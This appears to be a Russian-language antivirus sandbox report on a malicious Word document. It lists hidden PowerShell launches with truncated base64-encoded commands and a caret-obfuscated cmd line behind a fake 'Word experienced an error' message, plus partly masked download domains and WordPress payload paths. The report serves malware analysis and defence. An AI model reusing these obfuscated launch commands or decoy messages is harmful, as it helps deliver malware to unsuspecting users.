Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -ENCOD IAAgAHMAdgAgACgAIgBKACIAKwAiAFMAZgBhADUAIgApACAAIAAoACAAWwBUAHkAUABlAF0AKAAiAHsAMwB9AHsAMQB9AHsAMAB9AHsAMgB9AHsANAB9AHsANQB9ACIAIAAtAEYAJwBPACcALAAnAHMAVABFAE0A...
Сетевая активность
Подключается к
- 'sl###itcaps.com':443
- 'si###edental.vn':80
- 'si###edental.vn':443
- 'fr####chonline.com':80
- 'fr####chonline.com':443
- 'co#####scorporation.com':80
- 'co#####scorporation.com':443
TCP
Запросы HTTP GET
- http://si###edental.vn/wp-content/lQ/
- http://fr####chonline.com/downloads/D/
- http://co#####scorporation.com/wp-content/W3/
Другие
- 'sl###itcaps.com':443
- 'si###edental.vn':443
- 'fr####chonline.com':443
- 'co#####scorporation.com':443
UDP
- DNS ASK sl###itcaps.com
- DNS ASK si###edental.vn
- DNS ASK iz###enda.com
- DNS ASK fr####chonline.com
- DNS ASK co#####scorporation.com
- DNS ASK in#####groceries.com
- DNS ASK co####anceceo.com
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IAAgAHMAdgAgACgAIgBKACIAKwAiAFMAZgBhADUAIgApACAAIAAoACAAW...
- '<SYSTEM32>\msg.exe' user /v Word experienced an error trying to open the file.
